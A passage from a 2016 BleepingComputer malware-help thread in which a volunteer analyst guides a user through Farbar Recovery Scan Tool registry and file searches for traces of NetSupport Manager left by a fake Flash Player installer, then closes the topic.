Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:36 PM

Posted 20 October 2016 - 07:04 AM

I don't see any traces of NetSupport Manager on your system :) I'll still make you run a Registry and File search with FRST to be sure of it though.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Registry Search
Follow the instructions below to download and execute a Registry search on your system with FRST, and provide the log in your next reply.
  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • In the Search text area, copy and paste the following:
    NetControlKit
  • Once done, click on the Search Registry button and wait for FRST to finish the search;
  • On completion, a log will open in Notepad. Copy and paste its content in your next reply;
iO3R662.pngFarbar Recovery Scan Tool (FRST) - File Search
Follow the instructions below to download and execute a file search on your system with FRST, and provide the log in your next reply.
  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • In the Search text area, copy and paste the following:
    *netsystemkit*
  • Once done, click on the Search Files button and wait for FRST to finish the search;
  • On completion, a log will open in Notepad. Copy and paste its content in your next reply;
Is that file the fake flash player update you downloaded?
2016-10-19 16:19 - 2016-10-19 16:19 - 00117955 _____ (Аdоbе) C:\Users\King\Desktop\install_flаsh_plаyer_for_windows_4_1_9_0172.zip
If so, please upload it to the link below.

http://www.bleepingcomputer.com/submit-malware.php?channel=194

Your next reply(ies) should include:
  • Copy/pasted content of FRST Registry search log;
  • Copy/pasted content of FRST File search log;
  • Whether or not you uploaded the flash player .zip to the link above (if it was the fake flash player update);

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 zengotten

zengotten
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:08:36 PM

Posted 21 October 2016 - 01:23 AM

Yes that is the file, it was originally an .exe extension but I renamed it to a .zip extension so I could extract the files. I renamed it back to the original .exe extension then uploaded it to the link you provided.

 

It doesn't look like the registry searches found anything  :) :

Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by King (20-10-2016 23:17:04)
Running from C:\Users\King\Desktop
Boot Mode: Normal

================== Search Registry: "NetControlKit" ===========


====== End of Search ======
Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by King (20-10-2016 23:19:41)
Running from C:\Users\King\Desktop
Boot Mode: Normal

================== Search Registry: "netsystemkit" ===========


====== End of Search ======

Thank you for your help.


Edited by zengotten, 21 October 2016 - 01:26 AM.


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:36 PM

Posted 21 October 2016 - 07:19 AM

Thank you, I got the file and submitted it to Malwarebytes and Emsisoft :) Looks like there's no traces of NetSupport Manager on your system, so the script didn't have time to do anything.

Was it all? Did you need help with anything else, malware-related?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:36 PM

Posted 24 October 2016 - 07:19 AM

Hi zengotten,

Are you still with me? Do you need assistance with another malware-related issue, or is that all?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:36 PM

Posted 26 October 2016 - 07:24 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users